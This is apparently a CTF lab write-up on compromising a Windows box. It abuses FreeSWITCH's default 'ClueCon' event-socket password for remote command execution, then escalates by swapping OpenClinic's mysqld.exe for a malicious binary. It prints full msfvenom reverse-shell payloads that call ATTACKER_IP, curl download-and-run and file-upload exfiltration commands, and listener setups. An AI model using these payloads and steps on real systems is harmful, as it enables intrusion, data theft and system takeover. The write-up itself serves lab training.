Letβs add the target IP in the host file: /etc/host
sudo nano /etc/host
# Add the ip
MACHINE_IP target.local
This machine takes up some time to boot up, be patient, it took me around 20 mins to figure out it wonβt respond to ping.
Enumeration
βI will hunt you downβ
Letβs first start scanning the machine with Nmap first, since it does not respond to ping, we will not use traditional flags for nmap, instead, we shall use TCP scans.
nmap -sCVT -p- target.local -Pn
# This might be the following output from the scan
Nmap scan report for target.local
Host is up, received user-set (0.16s latency).
Scanned at 2023-02-03 21:26:36 IST for 363s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-02T15:35:32
| Not valid after: 2023-08-04T15:35:32
| MD5: b737fda0e13f6d7b23b9c899a285a3b4
| SHA-1: f9ebe7c6b75232a12fdcae9bcb2493b206016b0c
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQGIaArMRp4bVBxn4LTtO+zjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjMwMjAyMTUzNTMyWhcNMjMw
| ODA0MTUzNTMyWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDe/VIy17BE60cJyuy0DmRAc5WNzM32ywhi
| nezlHDJauTM0qoRplDFH6Ma/V9FPh3SN1Zu6lpIdWbKrJyMAgoQbKLDQEa133Adm
| hmcv0HYyc3B4uSEACdBeeX1NiHm0yo0ehIe0rXYxonXLkeNFCZkNDGWYypFHed4v
| jqbsp2WgYLWwOXGcTHxgU/Hvn9173u8jeI8tnQByEsjmKwP1O4TvohgBOdfYKb9O
| 3PRWNm8rzDl4Ta7C+CmlCaUGyc+U1mTQyMgCJx+nA1v4hPYJ0ZgDOe1J5NMqxXJ+
| n2AC4F0hO+/VwVuGCn0vaLh8W0KEqoJS37yw3z7xh+SH6f16vrypAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEA3QJP+0ZugwkmUf/rPC0TS++1TX8y2eIqDxCLV6aQGvHUbMkFNRJfL2Qg
| 4toAbeYJfwrbmXZX1YMcTXBJKvHANKU06t6V7+YSm3HzwcVvKtHc4sOSu+tl6FxR
| sSWJAc++0wv9KjgQh+kyl5yIpI+kfbNrsF/xtTEVRfQ/SaZhlPlnklb/5a+qz8N2
| TIdalDvX65E6WYCiSLoBf+bcfzSuLu245NoNkizksXN7HSl1SjLGnIuebty0q1id
| zj9UKWQcco24ssXyMrLgY5PfI7P1y1jpAz/mR+g0ocFTk1kqzS9gAhtaAb2hUEc7
| CxFf8VS8S5mrhn51/fOXleY2JERz/w==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2023-02-03T16:02:35+00:00
|_ssl-date: 2023-02-03T16:02:40+00:00; +1s from scanner time.
8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
It's intriguing that there are only a few open ports, and they seem to have tight restrictions on their functionality. One of these ports is 3389, where 'ms-bt-server' is running. A simple Google search for 'ms-bt-server' yields a helpful Nmap command that can be employed to assess its potential exploitability.
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 target.local -Pn
# Here is the output for the nmap enumeration via the RDP script
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
It performs checks for available encryption, potential DoS vulnerabilities (without causing a DoS), and gathers NTLM Windows information, including versions.
Regarding the RDP service, the password spraying method could be an option, but we lack both a username and password in this lab environment. Caution should be exercised, as using the password spraying method in real-life scenarios without proper credentials can lead to blockages.
Instead, let's explore the FreeSWITCH service running on port 8021. FreeSWITCH is a free and open-source server software designed for real-time communication applications like WebRTC, video, and Voice over Internet Protocol (VoIP). It's versatile, compatible with Linux, Windows, macOS, and FreeBSD.
Weaponization
βLock and Loadβ
A quick search in the msfconsole regarding FreeSWITCH led to some intriguing findings. If you plan to switch to that module, you'll discover that the default password being used is 'ClueCon.' Now, let's attempt to netcat the service. Given that it's a terminal-based service, this approach should work effectively.
msf> search freeswitch
# Search results might give you this particular result
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/misc/freeswitch_event_socket_cmd_exec 2019-11-03 excellent Yes FreeSWITCH Event Socket Command Execution
nc MACHINE_IP 8021
# Output
Content-Type: auth/request
ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Hmmm something is not right to let's try telnet
telnet target.local 8021
# Output
Trying 10.10.248.176...
Connected to target.local.
Escape character is '^]'.
Content-Type: auth/request
ClueCon
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Connection closed by foreign host.
Letβs try something else, let's use searchsploit
# To generate a msfvenom shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ATTACKER_IP LPORT=9999 -f exe -o reverse.exe
# Start the python webserver
python -m http.server 8080
# Deliver the exploit
python exp.py target.local 'curl http://ATTACKER_IP:8080/reverse.exe -o rev.exe'
# Start a Meterpreter session
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost ATTACKER_IP; set lport 9999; exploit"
# Finaly execute the exploit
python exp.py target.local 'rev.exe'
# You should be able to receive the session in msfconsole
# Switch to the shell
meterpreter> shell
Exploitation
βAccess Grantedβ
Letβs get the flag now
C:\Users\Nekrotic\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Nekrotic\Desktop
09/11/2021 07:39 <DIR> .
09/11/2021 07:39 <DIR> ..
09/11/2021 07:39 38 root.txt
09/11/2021 07:39 38 user.txt
2 File(s) 76 bytes
2 Dir(s) 50,111,950,848 bytes free
# Get the flag
type user.txt
# Output
THM{64bca084_REDACTED}
Now We need to escalate Privileges else we wonβt be able to get the root flag
Letβs deploy peas-ng for windows
# Deploy Peas-NG
cd C:\Users\Nekrotic
curl http://ATTACKER_IP:8080/winPEASany_ofs.exe -O win.exe
# Execute and make a report of the system
win.exe > report.txt
# Let's exfiltrate the file to get an overview of the system and what we are dealing with
# We will use curl
# It might take some time cause of file size
curl --upload-file report.txt http://10.17.6.255:69
By the way, there is a βprojectsβ folder in C drive that you might want to check
09/11/2021 07:18 <DIR> projects
# Upon closer inspection we can find
Directory of C:\projects\openclinic
09/11/2021 07:29 <DIR> .
09/11/2021 07:29 <DIR> ..
06/04/2021 22:14 250 configureCountry.bat
01/07/2021 17:20 167 configureLanguage.bat
09/11/2021 07:29 <DIR> jdk1.8
09/11/2021 07:18 334,840 lua5.1.dll
09/11/2021 07:19 <DIR> mariadb
07/06/2021 15:58 93,696 OpenClinic GA login.exe
08/05/2020 11:17 27,136 OpenClinicStartServices.exe
01/05/2021 23:45 316 stopOpenClinicHttp.bat
09/11/2021 07:30 <DIR> tomcat8
09/11/2021 07:29 <DIR> Uninstall
09/11/2021 07:18 1,389,568 uninstall.exe
7 File(s) 1,845,973 bytes
6 Dir(s) 50,207,125,504 bytes free
# The user seems to be using mysql as well, later on we can check for sensitive data in the database as well if we want to.
Since we know the user is running openclinic we can search for exploits against it
Privilege Escalation
βI am inevitableβ
searchsploit openclinic
# Output
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation | windows/local/50448.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
# Let's see what the exploit is all about
cat $(locate 50448.txt)
# Details
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low-privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system-level privileges
# (nt authority\system) due to the service running as Local System.
# While a low-privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
# Any low-privileged user can elevate their privileges by abusing the MariaDB service:
Wooho!! let's see if we can get root on this machine, using the methods listed.
# Generate the payload first
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=6969 -f exe > mysqld_evil.exe
# Inside victim machine
cd C:\projects\openclinic\mariadb\bin
# Create a backup of original mysqld.exe
ren mysqld.exe mysqld.bak
# Deploy the payload
curl http://ATTACKER_IP:8080/mysqld_evil.exe -o mysqld.exe
# Start Netcat listner on your local machine
nc -lvnp 6969
# Restart the victim computer from the previous shell
powershell Restart-Computer
# Now wait for the magic to happen
After a few moments, you shall receive the connection in your netcat listner
C:\Windows\system32>whoami
whoami
nt authority\system
# We got root
# Get the Root Flag
type C:\Users\Nekrotic\Desktop\root.txt
# Output
THM{8c8bc5558f0f_REDACTED}
Thank you for reading my post, have a great rest of your day, and good hunting π
